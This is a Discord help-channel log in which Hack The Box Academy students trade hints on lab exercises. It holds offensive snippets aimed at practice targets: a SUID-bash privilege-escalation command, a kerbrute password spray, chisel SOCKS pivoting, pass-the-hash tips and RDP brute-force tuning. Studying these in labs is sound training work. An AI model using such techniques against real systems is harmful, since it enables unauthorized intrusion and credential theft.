Hello everyone, I am asking my previous question again as more people are active now :). I am stuck on the last flag of the skills assessment of Web Proxies module. I have tried a lot of different things but it is impossible to send the metasploit requests into ZAP for further modifications. I have configured /etc/proxychains, I launch msfconsole with proxychains in front of it. I set Proxies in metasploit and in ZAP (both are the same)...I think I have tried everything I could at this point. If someone has an idea I would like to ear it 🙂 I am running ubuntu and connect to HTB via the VPN. How did you guys get the last challenge? Any other solution I am missing?

I didn't have any issues with this one, but I also used Burp instead of ZAP. Are the metasploit options configured correctly for your assigned Target IP and Port number?

Currently working on Skills Assessment 2 of Attacking Common Applications. I have everything but I cannot find the flag.txt 🤦‍♂️

I have a reverse shell - do I need to privesc in order to get the flag?
https://academy.hackthebox.com/module/113/section/1108

Yep, I have set RHOSTS and RPORT, I even try setting Proxies and SSL to true, but nothing in ZAP. Maybe I will try with Burp...

You can DM your metasploit config if you'd like.

For this one I did priv esc to root and then ran a search for the flag.

Thanks buddy, appreciate that, now I have to practice some privesc then 🤷‍♂️

Don't overthink it, normal linux enum should help you identify plenty of options.

hey... i'm having some problems with Logrotate. i've downloaded a new vpn and rest target a few times and get the same issue. i go through all the steps and it even says it set a symbolic link: Renamed /home/htb-student/backups with /home/htb-student/backups2 and created symlink to /etc/bash_completion.d
but there is never anything written not in /etc/bash_completion.d, /tmp or home folder, i've tried both. ||i also attempted to copy the flag, as well as create a simple bin/bash script to cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash ||

hey guys I have a question Can you buy cubs in HTB academy for gift to other student??

anyone know?

Hi, who can I contact for help in private messages on the Active Directory Trust Attacks - Skills Assessment module on question 2. I tried different vectors and I ran out of options. In private messages I will show what I have already done

No

https://academy.hackthebox.com/module/112/section/1069 I've tried AXFR, reverse lookups and DNS brute-force but it doesn't work and i didn't find any adress that ends with 203.It is the last exercise could someone give me advice what should i try?

Subdomains of Subdomains

Hello
When I try to start an instance I get this message : "Request validation failed".
I have tried to log out and in again, I did ctrl+shift+r to clear my cache and reload, I changed servers and nothing worked :/

I also waited for a dozen of minutes

Anyone???

Who is working on the Skill Assessment for the Password Attacks module? I got stuck here. I really appreciate some hints. Thanks in advance...!

drop me a pm i can assist ^

@snow spoke Ok, roger that

help

Does it matter that ParrotOS says the system dioes not have enough working memory and at least 4 GiB is required? Seems like a silly question but it says the same thing in the screenshots in the setting up module haha

You should be able to allocate at least 4GB of RAM to the vm, otherwise you get into some performance issues

Hi

please read and follow instructions in #welcome to gain access to #general and other channels. Also read #rules and #faq

Sorry

No need to apologize, you didn't do anything wrong, I'm just pointing you in the right direction

alright so close on AD Enumeration & Attacks - Skills Assessment Part I and the last question
"Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"

i have the NTLM hash i need and i cant seem to crack it. also trying a mix of port proxy and socks proxy has come up fruitless. have people had to crack this password and i need to keep digging or is there something im missing for trying to pass this hash? i already checked through the double hop problem but it all seems based on having the creds

Not sure what NTLM hash you have, but why not just PTH?

I'm tried with cme, evil-winrm but my problem is launching those from my attack box to the target. since I don't have a full foothold in and routing everything through one external box

So do you not have a pivot established that is capable of reaching your targets?

the pivot can reach and I've port proxied around to get to most hosts but for whatever reason port proxying to smb has failed me. sadly also some go to impacket tools don't support non standard ports

Sounds like a great opportunity to learn ligolo.

the double hop problem has to do with kerberos tickets iirc so it shouldn't bother you with a NT hash

and you should be able to PtH from a windows session if you're on the pivot and you have admin rights (look up the passwords module)

i had the same problem with socks proxy not working for a reason i still can't explain, but if you have a meterpreter session you can just use portfwd add .... and access a specific service from your attack host (like smb or winrm)

I'm so very stuck in the Password Attacks Skills Assessment, I'd appreciate some kinda help, been stuck for more than 5 hours and I've just logged in the machine

Hey guys, I am doing the "using web Proxies with inruder" module and I found the index.html file is the files name under the admin directory but firefox wont let me go to the site even after I disables all the security features and also burp intruder does not give me the html page in its response tab. I have been stuck on this for literally a fucking week. Any help would be really appreciated

The question says to do it at the /admin endpoint, did you do that?

Yep I did GET /admin/$1$.html

I am learning Linux Fundamentals but the vpn server is not showing up. The target machine is shown "Waiting to start"

the dollar sign was substituted with the burp add symbol

did you use the suggested word list?

I used the suggested wordlist common.txt and also another one, and I specifically loaded index

alright.. i'm not sure then maybe someone else can chime in, i didn't make notes for this module

I mean I found the file name. The only problem seems to be the browser flags it as insecure. I also tried ffuf and dirb and they all say index.html is the file. I just need to find out a way to get the page itself

You could use cURL, or click on advanced options on the insecure page and say proceed anyway

I don't get the advanced options on http. I only get it on https and even then I need my burp proxy setting on in firefox. and when I click advanced options. it takes me to the burp page and says "error reading SSl" and cURL does not work either. it doesn't return the page

you should only be using http anyway since the website is not configured for https also you don't have to keep burp proxy on you can just visit the page you found manually

I tried that too, but http would not even give me "advanced"

What does it give you?

It just give me the "learn more" option

can you read and follow instructions in #welcome real quick so you can post images here?

Just looking at the module now looks like you've got the wrong filename anyway

is it Errindex.html

Damn if I got the wrong filename, then my bad for wasting y'alls time, I'll get back to it

nope, which wordlist are you using?

common.txt and directory-medium

Just use the first one

ok let me run that

look for 200 status codes

Im running it rn

i just tested and that section works fine

make sure you're doing everything the module shows you, ie. right payload, skilling the regex, etc

Ok let me do that too

regex? There's a way to do this with regex? I clearly didn't pay enough attention to the section

it just cuts down the wordlist a bit, filters some stuff out

I want to start learning cyber secruity im new to the cyber space but not new to programming. What course should I start with in HTB?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@unkempt granite
-# mb to the other person I pinged

@feral fern please take care not to post content from modules above tier 0. just follow what the section says to do and you should get the flag.

ah ty!

You may leave your suggestion in /feedback and yes they really do read this it's just that it's a long list

Can someone please please please help with the Android Fundamentals module? I have been trying for weeks to find the build number for for Pixel 3a that the HTB module wants. Everything I entered is incorrect. I searched everywhere even with AI and all of the answers I get the HTB module says is wrong. I am a huge completionist but am ready to just give up on that module completely. Can someone help????

you can dm me.

Hello guys, for the LLMNR Poisioning from windows section, I've rdp'd into the desktop. When I use "Import-Module .\Inveigh.ps1" or "(Get-Command Invoke-Inveigh).Parameters", I'm getting errors saying the module doesn't exist. Both of these are commands shown in the section. Anyone able to help?

I'm relatively new to htb and i was wondering how much information about web/binary exploitation and pentesting i can pull from these courses?

There's the Bug Bountyand Web Exploitation Expert pathways in the modules that covers a lot about web exploitation. There's the reversing and binary exploitation module for binex

Unfortunately there's not a path for binex directly

but you can always try pwn challenges on the main lab platform

thank you so much!

trying to set up parrot os on virtual box but i just have this shell cli instead

https://unix.stackexchange.com/questions/326956/virtualbox-guest-suddenly-boots-only-into-uefi-interactive-shell

ah i just realised i cant use virtualbox cause im on apple silicon, gotta use utm instead

UTM will work fine mostly (and a lot faster than virtualbox imo)

Module: Introduction to Windows Evasion Techniques
Section: Process Injection
I cannot get this to run and spawn calc on EVASION even though it works correctly on the DEV box. Can anyone help with this, its been a few days.

Are you building as release x64?

yes

need some help here
https://academy.hackthebox.com/module/143/section/1271

I'm using the list of valid users (56 of them) with kerbrute and crackmapexec, however the enumeration stopped before the list completes. (21 users for kerbrute, 41 users for crackmapexec)

┌─[htb-student@ea-attack01]─[~]
└──╼ $wc -l valid_user.txt
56 valid_user.txt

┌─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_user.txt Welcome1
025/07/18 02:38:25 > Done! Tested 21 logins (0 successes) in 0.063 seconds

both enabling verbose in kerbrute and crackmapexec shows most users are LOCKED OUT, is that the reason why both tools fall short of running the complete user list?

hello

a nudge? I'm doing Introduction to Advanced CSRF & XSS Exploitation

I'm doing "CORS Misconfiguration" exercise

I am exfiltrating "profile.php" and I get the response, but the response is not "profile.php" but the login form.

It's like the victim does not have a cookie

What is the path to the htb-student's mail? I suck here

I have found the mail

folder

its saying incorrect

env

The path doesn't need to exist on the system for it to be in the environment

when I cd in the mail I do not see anything

It's asking specifically what the mail env is, not that it exists

Hello , i wanna ask about netflix

@fathom pendant ngl Im confused

You don't have to cd to the directory. Just check the environment variables

This has nothing to do with htb academy

Isnt a general chat!!

You can gain access to #general by following instructions in #welcome

Yeah m sorry

this is where Im lost\

what is environmental behaviour?

hi

In session security skill assessment

I am trying to access http://minilab.htb.net/submit-solution?url=http://<MYIP>:<PORT> however i get an error something went wrong.

nvm it worked after some tries in itself

environmental variables are different variables for your system.

Hey Guys,

im trying to log into the given target, but after entering the pw it says permission denied. I am at Linux Fundamentals Module 18 section 79. I checked the spelling auf the pw multiple times. Do I miss something?

Out of interest are some module sections written in a way whereby the practical portion is similar but does not follow the exact text?

I am on fence if I should post in erratum for this or if its intentional

File Upload Attacks - Client-Side Validation - Disabling Front-end Validation section.

Section reads:

<input type="file" name="uploadFile" id="uploadFile" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">

but in practical the Form & JS is different:

  <form action="upload.php" method="POST" enctype="multipart/form-data" id="uploadForm" onSubmit="if(validate()){upload()}">
    <input type="file" name="uploadFile" id="uploadFile" onChange="showImage()" accept=".jpg,.jpeg,.png">

so I couldn't do an exact comparison of behaviour, only that it uploads my files as section text requires

Most of them are similar but not exactly the same actually

It's intentional to make you think about it deeper

Makes sense and did cross my mind, thanks 🙂

Hello

Please contact the local police authorities

He means contact the police in YOUR country...

There's nothing we can do, contact whatever authorities you can

We really can't help you, just go to whichever authorities you can and make a report

Hi guys I'm stuck in the "skills assessment - password attack" section. How can I get a foot hold in the DMZ ? As 22 is the unique port open, I tried to hydra ssh with the username:password they gave In the instructions but it doesn't work. Can you give me some hints ?

use username anarchy

I already used it

dm

I can't message the Main Chat

read #welcome carefully

I an working in Intro to C2 with Sliver and I am trying to enumerate all the domain admins with SharpView.exe I keep getting the wrong info like only nested groups or groups and not all the user when using the -Recurse option. Here is my command. What Am I doing wrong. execute-assembly /home/saulgoodman/data/sliver/sliver/SharpView.exe Get-DomainGroupMember -Identity "Domain Admins" -Recurse

i need help with password attacks Writing Custom Wordlists and Rules.

I need a specific user in the DA group however. I don't know their username.

My output -

can someone help

Hi, how do I seek help for target machine timing out? Tried restarting already; times out on RDP and SMB, also tried both from Pwnbox and VPN from my local machine. Tried waiting 2 h already for traffic to get better

I’m also experiencing issues with my academy connection. Constantly times out and needs a couple of minutes before working again. Is there anything I can do to fix this?

Hi, below are the instructions from PKI ESC1 module but I am not sure how to go about enabling the portforwarding any resources or guidance will be appreciated. I have had rdp into the kali and then rdp into WS001 so far and its so slow it borders on unusable:

For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.

Hi all was wondering in the modules. Do you find some questions confusing or vague?

Here is the questions i don't quite understand

Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

I am guessing they are talking about TCP header flags.

nmap can enumerate service version

yeah which i did with the following command : sudo nmap 10.129.232.100 -p- -sV

Hello, I don't know why I can't connect via HTTP. When I enter the IP address of my module in my browser, it loads indefinitely. My VPN is connected, I've tried several connection protocols, restarted my OS, changed browsers, created a new lab, but the issue persists. Does anyone have a solution?

note : ping is working fine, also my nmap is fine

Hi, Any tips on how to make RDP Bruteforce faster but without crashing the bruteforce. The normal hydra, netexec are slow Hydra makes error if not set with -W 1 and -t 4 but that is too slow. Other than that any tips the total combination to test is 12k.

name the submodule and module

increase threads?

module?

Learn the basics
of Penetration Testi : Crocodile

Network Enumeration with Nmap module 19 section 103

hi

Quick hack?

Is the website down? I can’t access it.

The Live Engagement bug? [-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass when I try to exploit using the 50064.rb. I cannot proceed because the payload provided isn't working?

It’s not

Close and restart msfconsole

didn't work

Make sure to set all variables properly then, iirc vhost may be required in this instance.

Ah yes, thanks

try connecting to ports using netcat/nc

Ah will try tomorrow rang out of time on the pwnbox

thanks for the hint

"Network Services" < module >

What’s wrong with this? I’ve been trying to solve the last two tasks related to SMB and RDP for several hours using the following commands. It runs, but I’m not finding anything relevant. I’m connected via VPN on my VM, which is working just fine.

crackmapexec rdp 10.129.90.148 -u username.list -p password.list

For SMB, I’m working with msfconsole, and so far I’ve found 4 valid users — but the scan is still in progress, and it’s taking hours.

As for RDP, I have no idea what else to try.

I am having issues with rdp to target machines also

Hydra is generally better for rdp, also "network services" is the section name - not module name

Right.

It should take hours, HYDRA too?

Hydra is just a bit cleaner, also netexec should be used in place of crackmapexec

I will try, thanks for now

You guys, i don’t have much money at the moment and im wondering if i buy the premium monthly subscription and I get these 100 cubes, will I be able to finish the whole pentester path with it without doing other things on the htb?

You would need a subscription to unlock more modules. It's a lot cheaper if you have are a student and have an .edu email they recognize. Otherwise it'll cost a lot more cubes to unlock the full path.

Hey there. I'm at the privilege escalation module. I got access to user1, switched to user2 and located the flag.txt but I have to login as root to access it. I also located the .ssh directory which I have read access to only, so I can't insert my own keys. I tried copying the id_rsa into a file, I gave it chmod 600 and it says this error when I try ssh connection to root: Permission denied (publickey)
What am I doing wrong?

Is it worth making a windows VM to install all the tools on, if my base OS is windows or shoudl I just install it on this?

on the host os*

Are you specifying the id_rsa (-i) also, thats not the module name -- thats the section name

ssh root@ip -i id_rsa
this is what i use

i use key instead of id_rsa though cuz thats its name on my computer

when can i start learning ctf as a beginner in cybersec? after doing introduction to networking?

And you copied the whole file? Including the -----BEGIN.. and -----END lines?

I also dont recall if this is a public_ip and port

yes, i created a document file and pasted it there

is that ok?

If its an ip:port, you still need to specify port

when i specified port it asked for password

that means the ssh is working but i need the pw?

Load key "id_rsa" error in libcrypto
Permission denied (publickey)

When i specify the port it only gives me the libcrypto error

fixed it somehow might have copied soemthing wrong, i got the flag

Hi, where do I go to to get support for the VPN for the module. It keeps getting disconnected and is extremely slow!

Hi, below are the instructions from PKI ESC1 module but I am not sure how to go about enabling the portforwarding any resources or guidance will be appreciated. I have had rdp into the kali and then rdp into WS001 so far and its so slow it borders on unusable:

For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.

.

ssh -D <port for dynamic prt fwd, 9050 is what i set it to> -X host@ip

-X is for x11 forwarding which will let you use xfreerdp on kali to actually see the rdp window

Theoretically you could also use proxychains and SOCKS tunneling to rdp if you wanna practice pivoting too lol

for added clarity you would run ssh -D 9050 -X kali@ip, then use xfreerdp on the SSH connection, proxychains isnt exactly needed however i believe it is already configured on the pwnbox, therefore you can also use proxychains like so:

• ssh -D 9050 kali@ip
• proxychains xfreerdp /v:windowsIP /u:user /p:password /dynamic-resolution

lmk if this worked for u

thank you I will try that tomorrow

Hi there just wondering if I should create a VM for setting up on windows or just use my base OS since that is windows/

?*

 Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. 

Need help

Active directory living off the land

Hello, I am using Metasploit's autoroute to pivot and scan a target network, but db_nmap feels slow (likely due proxy) Any faster built-in Metasploit alternatives (besides directly uploading and use Nmap at the pivot)?

How many people did CAPE CWEE get?

#boxes

ouch

my bad, so sorry

#cdsa message

Any phishing websites available?

what does this have to do with modules?

Just asking.

please read the #rules. this is not the appropriate channel for such discussions, this channel is dedicated for module talk.

@north arch Again, read the #rules. DMing without permission is against the rules.

Sorry about that.

Am new here

Read the #rules and follow the instructions in #welcome to gain access to other channels.

Hi i have an issue in information gathering web edition

I try to do a nikto in the target but i have nothing

In fingerprinting part

https://academy.hackthebox.com/module/143/section/1274
Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

I don't know what the password is, I need some help.

Guys im really stuck in this question "Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words)." - WordPress - Discovery & Enumeration
https://academy.hackthebox.com/module/113/section/1100

Any one can help me please? i have been tried every techniques as possible (such as fuzzing plugins paramter and debbuging the webpages).

Maybe try restarting the environment or switching regions/servers

Hi, anyone can help me with introduction to deserialization attacks skill assessment 2?

I'm stuck the serialization data has a HMAC signature so I don't know how to tamper the data to privesc

any hints? please

Run as...

And you have the password

how do i get more cubes without buying it

so i have to buy them

Rewards from being active on seasonal content

doesnt let me

seasonal content

where do i get into that

https://app.hackthebox.com

sorry if im bothering just curious

A bit of a catch 22

Gotta know stuff to get stuff

so the app and academy are 2 diff things

Same company, different platforms

could you hack my discord acc hypothetically speaking

from what hackthebox teachs ethically if i gave you the permisson

not that i want to but still

Hello,
Can any one guide me how to move on after knowing all the basics of network and pentesting ,like continue with htb or join a community so I can learn more practical things because i feel little stuck

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thank you I know the basics but I feel it kind of I need to be more practical or you suggest to continue like these and I well be more practical?

did you do the all modules

No
I am continually doing them

hackthebox gives till advanced with paid versions

cracking wifi codes, or invading the https sites with a terminal but those i think are beginners or intermidate

https://app.hackthebox.com/ here

you can get more pratical here

So I focus on htb will make me more familiar to everything as in real world ?

Best to ask somewhere like #general or maybe #careers-and-certs. You'll have to follow the instructions in #welcome to gain access, this channel is for module discussion.

i dont have the permisson to speak

you wont be able to hack banks or games cuz thats next level but htb is a very good site to be able to get in cybersecurity

Yeah that's why I said you'd have to follow the instrucions in #welcome to gain access.

oops i didnt read that mb ill do that

solved, i lost many time in this question... and was very simple thing omg

Hi, how are you? I'm thinking of purchasing a VIP membership for The Hack Box, but I have some questions about the service.

????

Hi, welcome. Make sure to read the #rules and follow the instructions in #welcome to gain access to most channels. May be a better question for #general as this channel is dedicated for discussion of the modules on HTB.

Hello, okay, but I really completed all the rules and the Discord server has not given access for a day, so I can't interact.

Yeah you have to follow the instructions in #welcome

https://academy.hackthebox.com/module/115/section/1120

Quesiton 2
I rly need help

what problem u facing?

hello guys. may i ask how you guys solve this module https://academy.hackthebox.com/module/77/section/843 ?

[] 94.237.61.242:59902 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 94.237.61.242:59902 - An SMB Login Error occurred while connecting to the IPC$ tree.
[] 94.237.61.242:59902 - Scanned 1 of 1 hosts (100% complete)
[*] 94.237.61.242:59902 - Cannot reliably check exploitability.

when i tried to run as what was instructed it shows this in the check

It's not the same exploit in the section. Have you tried visiting the ip:port in a browser to look around?

let me try that

i tried it but its not working it did send me to a website and i look around

there should be a big hint on what to attack on the website for you

copy thanks will looking for it

Are red team or blue team modules prerequisite to purple team ones?

Or no?

I’m curious since they started adding purple modules

And if so will purple team modules be harder?

Or are they meant to build upon either red or blue team skills or both?

Or neither and what does a purple teamer actually do

the module's overview page shows any recommended prereq's

hello
i was trying to solve this question - What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
and ran this command -- find . -type f -name "*.conf" -newermt 2020-03-03 -size +25k -size -28k -ls 2>/dev/null
i recieve no output
am i doing something wrong

Hi guys! i am having issues with some socks on Windows lateral movement.
Long story short is as follows, Im going to pivot from the dualhomes SRV01.
On kali i run chisel server --reverse --socks5 on SRV01 i run .\chisel.exe client <IP>:8080 R:socks. I get the expected output server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening and i get the connection.

Now!
proxychains xfreerdp works as expected on an internal machine.
proxychains evil-winrm works as expected on an internal machine.
nmap -sT does NOT work.
impacket-dcomexec does NOT work.

I cant understand why some tools work, and others do not?

add, my proxychains.conf is socks5 127.0.0.1 1080

Try running them with sudo

the tools or proxychain?

Thank you SO MUCH! it worked, sudo proxyhains

yo guys anybody having this issue where tmux mouse deselects as soon as i let go the left mouse button ?

sry for the hidden mouse its a wayland thing issue

also right click menu acts the same

https://unix.stackexchange.com/questions/516800/how-do-i-enable-tmux-mouse-support

Hey, is there a place here to find a team or teammates for CTFs?

#1318239802931286066
if you don‘t have access, read and follow #welcome

Hi everyone, what is the meaning of "ritired machine"?

Can i play it or not?

Im new on htb, 0 rank

Hi, please read and follow instructions in #welcome

A Retired Machine is a machine that was active and has been retired or has been released as retired, you can still play retired machines, some are free, some require VIP or VIP+ to play. Since they are retired public writeups are allowed but they do not contribute to your ranks or provide points

Thx, so they are useful for training only

You can also use them for testing tools or PoCs

Got it, but not for elevate my rank

i reffered my friend but i didnt got the cubes but they did got it (yes they did completed intro to academy module)

Tried this and seen other posts too but nothing seems to work

Looks like its not a popular issue

Well most people using tmux don't tend to use the mouse 😅

We usually go into selection mode and use vim keybindings

Here comes tbe second issue

Keybindings like copy also dont work

I can select text, but cant copy even if i set a new key bind for copy

Well it only copies for tmux, you'd have to set a keybind for an xclip command iirc

it's like a vim copy (yank, y) and paste (p)

So tmux has its own clipboard ?

In a sense yes

Ahaa i get it now

https://unix.stackexchange.com/questions/131011/use-system-clipboard-in-vi-copy-mode-in-tmux

This gonna work thanks G

In the shells and payload live engagement section.
I was doing host 3 after completing host 1 and 2.
But I think I crashed the server after repeated exploitation attempts with different ms17 versions - it timed out and didn't give any response after a while.

I restarted the lab environment.
But now host 3 is unreachable when I ping it. Host 1 and 2 are completely fine. Previously host 3 gave ping response and now it doesn't.

Is this issue on my end or the lab environment?

Can someone help me with Session Hijacking exercise
https://academy.hackthebox.com/module/103/section/1008

Apparently when I pass the payload on the website no response is shown back to me in the php server

Hi, I'm struggling to find this path right here. I tried multiple times myself with cd commands but I still can't find it. Am I missing something?

it's just asking for the path, no need to cd into it

I found /var/mail but it was the wrong answer

Where are system-relevant things configured and stored? Have a look there

You mean etc?

no

But that directory doesn't exist tho

I did echo $MAIL

To find it

Even if the directory itself doesn't exist the environment has it as the mail directory

also deleted your message cos it contained the answer

My bad

Ohhh I see. And I found it using the name of the enviroment variable

Solved, ngl I'm so brainless i dont even wanna talk about it. I didn't define port in the script.js file and that is the reason why i had no responses.

Hi! did you manage to find the expected configuration for this question?

Hello can someone help me with this question??

Q: Submit the NT hash associated with the Administrator user from the example output in the section reading.

This is from Password Attacks, Attacking Active Directory and NTDS.dit

The problem is that I can't seem to figure out the username, from the list I have created by going onto the website and finding the email address. What am I doing wrong, tell me if you need more information.

Strange! Thanks 🙂 . Did you also find the lab to be very laggy?

Hi

Yo

hey to start learning, I need to start from tier 0, right?

Where is the hack the system(a past ctf) channel containg the writeups in it?
Does htb delete past ctf channels!!!

That depends on what you already know.

Hi everyone, I'm having a bit of trouble with the "Pass the Certificate" part of the "Password Attacks" module. For the 2nd question, when you need to use ntlmrelayx and printerbug to obtain a cert from the DC01 machine, I've tried from my machine, and from the pwnbox, I get the same error each time, I went and looked for the solution, I'm apparently doing everything right, so I don't really know what to do, if anyone may help, thanks

iirc set --target flag

Can anyone give me a clue on Artificial machine htb, I have no clue on how to get into it, no ports are vulnerable and the site itself isn't vuln to stuff like sql and xss,, any clues?

I got hacked

Dm if you can

Contact the support of your account provider